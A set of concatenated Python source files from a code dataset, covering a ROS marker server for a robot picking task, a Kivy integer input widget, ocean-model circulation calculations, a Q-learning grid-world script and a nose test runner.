menu_handler = MenuHandler()
counter = 0
objects_name_list = None
base_frame_id = "/base"
def frameCallback( msg ):
global counter, objects_name_list
counter+=1
if objects_name_list:
for object_name in objects_name_list:
int_marker = server.get(object_name)
if int_marker:
cur_pose = int_marker.pose
quat = transformations.quaternion_about_axis(2 * 3.14159286 * (1.0 / 1000), (0,0,1))
quat = transformations.quaternion_multiply([cur_pose.orientation.x, cur_pose.orientation.y, cur_pose.orientation.z, cur_pose.orientation.w], quat)
cur_pose.orientation.x = quat[0]
cur_pose.orientation.y = quat[1]
cur_pose.orientation.z = quat[2]
cur_pose.orientation.w = quat[3]
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
def processFeedback( feedback ):
server.applyChanges()
def makeTargetObject( msg, object_name ):
marker = Marker()
marker.type = Marker.MESH_RESOURCE
marker.scale.x = msg.scale * 3
marker.scale.y = msg.scale * 3
marker.scale.z = msg.scale * 3
marker.mesh_resource = "package://jsk_apc2015_common/meshes/" + object_name +"/" + object_name + ".dae"
marker.mesh_use_embedded_materials = True
return marker
def makeBoardObject( msg , object_name):
marker = Marker()
marker.type = Marker.CUBE
marker.scale.x = 1
marker.scale.y = 5
marker.scale.z = 0.1
if object_name == "left_board":
marker.color.r = 1
marker.color.g = 0.2
marker.color.b = 0.2
marker.color.a = 0.5
else:
marker.color.r = 0.2
marker.color.g = 0.2
marker.color.b = 1
marker.color.a = 0.5
return marker
def makeDaeObject( msg , object_name):
marker = Marker()
marker.type = Marker.MESH_RESOURCE
marker.scale.x = msg.scale * 2
marker.scale.y = msg.scale * 2
marker.scale.z = msg.scale * 2
marker.mesh_resource = "package://jsk_apc2015_common/meshes/" + object_name +"/" + object_name + ".dae"
marker.mesh_use_embedded_materials = True
return marker
def makeTargetObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeTargetObject(msg, object_name) )
msg.controls.append( control )
return control
def makeBoardObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeBoardObject(msg, object_name) )
msg.controls.append( control )
return control
def makeDaeObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeDaeObject(msg, object_name) )
msg.controls.append( control )
return control
def makeInteractiveBoardObject( object_name, position, quaternion):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeBoardObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.NONE
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def makeInteractiveDaeObject( object_name, position, quaternion):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeDaeObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.NONE
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def make6DofMarker( object_name, position, quaternion ):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeTargetObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.MOVE_3D
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def setObjectPoses(msg):
global tl
for target_object in msg.objects:
int_marker = server.get(target_object.object_name)
if int_marker:
transed_point = tl.transformPoint(base_frame_id, target_object.position)
cur_pose = int_marker.pose
cur_pose.position = transed_point.point
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
work_order_list={"right":[], "left":[]}
def setWithWorkOrder(msg, callback_args):
global work_order_list
arm = callback_args["arm"]
msg.array.reverse()
if len(work_order_list[arm]) == 0:
work_order_list[arm] = msg.array
target_counter = 0
grabbed_counter = 0
for target_object in work_order_list[arm]:
int_marker = server.get(target_object.object)
if int_marker:
cur_pose = Pose()
if target_object in msg.array:
cur_pose.position.y = 1 if arm == "left" else -1
cur_pose.position.x = - 0.5 - target_counter * 0.5
cur_pose.position.z = 0
cur_pose.orientation = int_marker.pose.orientation
target_counter+=1
else:
cur_pose.position.y = (2 + grabbed_counter * 0.5) * ( 1 if arm == "left" else -1)
cur_pose.position.x = 5.0
cur_pose.position.z = 2.6
cur_pose.orientation = int_marker.pose.orientation
grabbed_counter+=1
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
if __name__=="__main__":
rospy.init_node("target_object_marker_server")
rospy.Subscriber('~set_pose', SetObjectPositionArray, setObjectPoses)
rospy.Subscriber('/left/work_order_list', WorkOrderArray, setWithWorkOrder, {"arm":"left"})
rospy.Subscriber('/right/work_order_list', WorkOrderArray, setWithWorkOrder, {"arm":"right"})
tl = TransformListener()
rospy.Timer(rospy.Duration(0.01), frameCallback)
server = InteractiveMarkerServer("target_object_marker_server")
rospack = rospkg.RosPack()
with open(rospack.get_path("jsk_2015_05_baxter_apc") + "/data/object_list.yml", 'rb') as f:
objects_name_list = yaml.load(f)
for i,object_name in enumerate(objects_name_list):
position = Point( - i / 5 - 5 , i % 5 - 2.5, 0)
quat = transformations.quaternion_about_axis(2 * 3.14159286 * (i * 1.0 / len(objects_name_list)), (0,0,1))
quaternion = Quaternion(quat[0], quat[1], quat[2], quat[3])
make6DofMarker( object_name, position, quaternion )
position = Point( -2.8, -0.8, 0)
quat = transformations.quaternion_about_axis(3.14159286/2, (0,0,1))
quaternion = Quaternion(quat[0], quat[1], quat[2], quat[3])
makeInteractiveBoardObject("left_board", position, quaternion)
position = Point( -2.8, 0.8, 0)
makeInteractiveBoardObject("right_board", position, quaternion)
makeInteractiveBoardObject("right_board", position, quaternion)
position = Point( 5, 0, 2)
makeInteractiveDaeObject("score_board", position, quaternion)
server.applyChanges()
rospy.spin()
| StarcoderdataPython |
1724808 | <gh_stars>0
from kivy.uix.textinput import TextInput
from kivy.properties import NumericProperty
import math
class IntEntry(TextInput):
value = NumericProperty(0.0)
def __init__(self, low=-math.inf, high=math.inf, **kwds):
if low >= 10:
# Because otherwise we couldn't ever type the first digit
# TODO: figure out how to fix this
raise ValueError('low must be less than 10')
if low >= high:
raise ValueError('Empty slider')
self.low = low
self.high = high
digits = math.log10(max(abs(low), abs(high))) + 1
self._width = int(min(digits, 12)) + (low < 0)
super().__init__(multiline=False, **kwds)
def insert_text(self, substring, from_undo=False):
c = self.cursor[0]
text = self.text[:c] + substring + self.text[c:]
if self._validate(text):
super().insert_text(substring, from_undo=from_undo)
def on_text(self, _, text):
self.value = int(text or '0')
def on_value(self, _, value):
self.text = str(value)
def _validate(self, text):
if text == '' or self.low < 0 and text == '-':
return True
try:
return self.low <= int(text) <= self.high
except Exception:
pass
class IntEntry2(TextInput):
value = NumericProperty(0.0)
def __init__(self, low=-math.inf, high=math.inf, **kwds):
if low >= 10:
# Because otherwise we couldn't ever type the first digit
# TODO: figure out how to fix this
raise ValueError('low must be less than 10')
if low >= high:
raise ValueError('Empty slider')
self.low = low
self.high = high
digits = math.log10(max(abs(low), abs(high))) + 1
self._width = int(min(digits, 12)) + (low < 0)
super().__init__(multiline=False, **kwds)
def insert_text(self, substring, from_undo=False):
c = self.cursor[0]
text = self.text[:c] + substring + self.text[c:]
if self._validate(text):
super().insert_text(substring, from_undo=from_undo)
def on_text(self, _, text):
self.value = int(text or '0')
def on_value(self, _, value):
self.text = str(value)
def _validate(self, text):
if text == '' or self.low < 0 and text == '-':
return True
try:
return self.low <= int(text) <= self.high
except Exception:
pass
| StarcoderdataPython |
3274357 | """Calculations with grid-aware data sets."""
import xgcm
def calculate_moc(ds, region=""):
"""Calculate the MOC.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
region : str
A region string. Examples: `"atl"`, `"pac"`, `"ind"`.
Defaults to `""`.
Returns
-------
moc : xarray data array
A grid-aware data array with the moc for the specified region. The
data array will have a coordinate called `"lat_moc{region}"` which is
the weighted horizontal and vertical avarage of the latitude of all
latitudes for the given point on the y-axis.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
vmaskname = "vmask" + region
mocname = "moc" + region
latname = "lat_moc" + region
weights = ds[vmaskname] * ds.e3v * ds.e1v
Ve3 = weights * ds.vomecrty
# calculate indefinite vertical integral of V from bottom to top, then
# integrate zonally, convert to [Sv], and rename to region
moc = grid.cumsum(Ve3, "Z", to="left", boundary="fill") - Ve3.sum("z_c")
moc = moc.sum("x_c")
moc /= 1.0e6
moc = moc.rename(mocname)
# calculate the weighted zonal and vertical mean of latitude
lat_moc = ((weights * ds.llat_rc).sum(dim=["z_c", "x_c"]) /
(weights).sum(dim=["z_c", "x_c"]))
moc.coords[latname] = (["y_r", ], lat_moc.data)
# also copy the relevant depth-coordinates
moc.coords["depth_l"] = ds.coords["depth_l"]
return moc
def calculate_psi(ds):
"""Calculate the barotropic stream function.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
Returns
-------
psi : xarray data array
A grid-aware data array with the barotropic stream function in `[Sv]`.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
U_bt = (ds.vozocrtx * ds.e3u).sum("z_c")
psi = grid.cumsum(- U_bt * ds.e2u, "Y") / 1.0e6
psi -= psi.isel(y_r=-1, x_r=-1) # normalize upper right corner
psi = psi.rename("psi")
return psi
def calculate_speed(ds):
"""Calculate speed on the central (T) grid.
First, interpolate U and V to the central grid, then square, add, and take
root.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
Returns
-------
speed : xarray data array
A grid-aware data array with the speed in `[m/s]`.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
U_cc = grid.interp(ds.vozocrtx, "X", to="center")
V_cc = grid.interp(ds.vomecrty, "Y", to="center")
speed = (U_cc**2 + V_cc**2)**0.5
return speed
| StarcoderdataPython |
80679 | <reponame>Octavian-ai/synthetic-graph-data<gh_stars>10-100
from basic_types import NanoType
class Style(NanoType[str]):
pass | StarcoderdataPython |
159659 | """
Reinforcement Learning Using Q-learning, Double Q-learning, and Dyna-Q.
Copyright (c) 2020 <NAME>
References
----------
- Based on project 7 in the Georgia Tech Spring 2020 course "Machine Learning
for Trading" by Prof. <NAME>.
- Course: http://quantsoftware.gatech.edu/CS7646_Spring_2020
- Project: http://quantsoftware.gatech.edu/Spring_2020_Project_7:_Qlearning_Robot
- Main book reference: Sutton and Barto, "Reinforcement Learning: An Introduction"
(http://incompleteideas.net/book/the-book-2nd.html)
Characteristics
---------------
- The code has been written and tested in Python 3.7.7.
- Q-learning implementation for reinforcement learning.
- Options: basic Q-learning, Dyna-Q (for model planning), double Q-learning (to
avoid maximization bias).
- Dyna-Q has been implemented with both a deterministic model and a probabilistic
model.
- The deterministic model and probabilistic model have both two versions, one
using dictionaries (less memory but slower) and one using arrays (more memory
but faster).
- Double Q-learning can be used with basic Q-learning as well as with Dyna-Q.
- The Q-learning class in <QLearner.py> can be used for any reinforcement learning
problem, while <robot.py> and <test.py> are specific for a grid-world type of
problem (i.e. finding the best policy to go from a start point to a goal point).
- Usage: python test.py <csv-filename>.
Parameters
----------
sys.argv[1]
File name with the map layout passed as argument. It must be in a csv file,
with the map elements specified using integer numbers.
map_elements
List of elements allowed in the map layout.
reward_list
List of rewards associated to each element in <map_elements>.
move_list
List of allowed moves for the robot.
episodes
Number of episodes (each episode is a trip from start to goal)
max_steps
Maximum number of steps allowed to reach the goal (for each episode).
0 <= random_rate <= 1
Probability the robot will move randomly instead to move as required.
0 <= alpha <= 1
Learning rate (used to vary the weight given to new experiences compared with
past Q-values).
0 <= gamma <= 1
Discount factor (used to progressively reduce the value of future rewards).
0 <= rar <= 1
Probability of selecting a random action instead of using the action derived
from the Q-table(s) (i.e. probability to explore).
0 <= radr <= 1
Rate decay for the probability to explore (used to reduce the probability to
explore with time).
dyna >= 0
Number of simulated updates in Dyna-Q (when equal to zero Dyna-Q is not used).
model_type = 1, 2, 3, 4
Type of model used for the simulation in Dyna-Q (1-2 are deterministic models,
3-4 are probabilistic models).
double_Q = True, False
Specifies if double Q-learning is used (to avoid maximization bias).
Examples
--------
All examples are for the map layout in `map.csv`. All initial data are as in this
file, except when differently specified.
- Basic Q-learning, episodes = 1000, dyna = 0
REWARDS: mean = -63.1, median = -32.0, std = 109.8
STEPS: mean = 62.1, median = 34.0, std = 96.3
Number of updates done: 62085
BEST PATH: rewards = -22.0, Steps = 24.0
- Double Q learning, episodes = 1000, dyna = 0
REWARDS: mean = -85.0, median = -40.0, std = 132.7
STEPS: mean = 85.5, median = 42.0, std = 130.5
Number of updates done: 85473
BEST PATH: rewards = -22.0, Steps = 24.0
- Double Q-learning, episodes = 50, dyna = 200, model_type = 1
REWARDS: mean = -70.7, median = -28.0, std = 158.5
STEPS: mean = 52.9, median = 30.0, std = 93.5
Number of updates done: 531243
BEST PATH: rewards = -22.0, Steps = 24.0
- Basic Q-learning, episodes = 50, dyna = 200, model_type = 4
REWARDS: mean = -92.7, median = -42.5, std = 183.9
STEPS: mean = 76.9, median = 44.5, std = 94.5
Number of updates done: 567340
Number of updates skipped: 205103
BEST PATH: rewards = -22.0, Steps = 24.0
- Basic Q-learning, episodes = 1000, dyna = 0, but using an 8-way robot
REWARDS: mean = -66.6, median = -25.0, std = 120.9
STEPS: mean = 63.3, median = 27.0, std = 100.1
Number of updates done: 63261
BEST PATH: rewards = -13.0, Steps = 15.0
"""
import sys
import numpy as np
import QLearner as ql
import robot as rb
# Elements allowed in the map
map_elements = [' ', # 0 = empty space
'#', # 1 = wall/obstacle
'S', # 2 = start (must be defined)
'G', # 3 = goal (must be defined)
'~'] # 4 = sand
# Rewards (must correspond to elements in the map)
reward_list = np.array([-1.0, # empty space
-1.0, # wall/obstacle
-1.0, # start (walk-back)
+1.0, # goal
-100.0]) # sand
# Directions of motion (4-way robot)
move_list = np.array([[-1, 0], # Go North one step
[ 0, +1], # Go East one step
[+1, 0], # Go South one step
[ 0, -1]]) # Go West one step
# Directions of motion (8-way robot)
# move_list = np.array([[-1, 0], # Go North one step
# [-1, +1], # Go North-East one step
# [ 0, +1], # Go East one step
# [+1, +1], # Go South-East one step
# [+1, 0], # Go South one step
# [+1, -1], # Go South-West one step
# [ 0, -1], # Go West one step
# [-1, -1]]) # Go North-West one step
# Other grid-world parameters
episodes = 1000 # Number of episodes
max_steps = 10000 # Max. number of steps for each episode
random_rate = 0.2 # Probability the robot will move randomly
# Q-learner parameters
alpha = 0.2 # Learning rate
gamma = 0.9 # Discount factor
rar = 0.50 # Probability to explore
radr = 0.99 # Rate decay for the probability to explore
dyna = 0 # Number of simulated updates in Dyna-Q (not used if zero)
model_type = 1 # Type of model used for the simulation in Dyna-Q
# 1 = Deterministic model (T and R defined as dictionaries)
# 2 = Deterministic model (T and R defined as arrays)
# 3 = Probabilistic model (T and R defined as dictionaries)
# 4 = Probabilistic model (T and R defined as arrays)
double_Q = False # True = use double Q-learning
# False = don't use double Q-learning
# ======= Main Code ======= #
np.random.seed(1)
# Read the map layout from the csv file specified on the command line
if (len(sys.argv) != 2):
print("Usage: python test.py <csv-filename>")
sys.exit(1)
map_layout = np.asarray(np.loadtxt(sys.argv[1], delimiter=','), dtype=int)
# Initialize robot and map quantities
bot = rb.robot(map_layout, map_elements, reward_list, move_list, max_steps=max_steps,
random_rate=random_rate)
# Initialize the Q-learner
num_states = map_layout.size
num_actions = move_list.shape[0]
learner = ql.QLearner(num_states, num_actions, alpha=alpha, gamma=gamma, rar=rar,
radr=radr, dyna=dyna, double_Q=double_Q, model_type=model_type)
# Build the Q-table(s)
scores, steps = bot.optimize_path(learner, episodes)
# Print results
print()
print("REWARDS: mean = {0:6.1f}, median = {1:6.1f}, std = {2:5.1f}"
.format(np.mean(scores), np.median(scores), np.std(scores)))
print("STEPS: mean = {0:6.1f}, median = {1:6.1f}, std = {2:5.1f}"
.format(np.mean(steps), np.median(steps), np.std(steps)))
print("Number of updates done: ", learner.count_update_Q)
if (dyna > 0 and (model_type == 2 or model_type == 4)):
print("Number of updates skipped: ", learner.count_skip)
# Print best map and corresponding rewards and steps
best_map, best_reward, best_step = bot.best_path(learner)
bot.show_map(best_map)
print("BEST PATH: rewards = {0:5.1f}, Steps = {1:5.1f}".
format(best_reward, best_step))
| StarcoderdataPython |
1604118 | # -*- coding: utf-8 -*-
'''
The main test runner script.
Usage: ::
python run_tests.py
Skip slow tests
python run_tests.py fast
When there's no Internet
python run_tests.py no-internet
'''
from __future__ import unicode_literals
import nose
import sys
def main():
args = get_argv()
success = nose.run(argv=args)
sys.exit(0) if success else sys.exit(1)
def get_argv():
args = [sys.argv[0], "tests", '--verbosity', '2']
attr_conditions = []
attr_conditions.append("not skip")
attr_expression = " and ".join(attr_conditions)
if attr_expression:
args.extend(["-A", attr_expression])
return args
if __name__ == '__main__':
main()
| StarcoderdataPython |
Subsets and Splits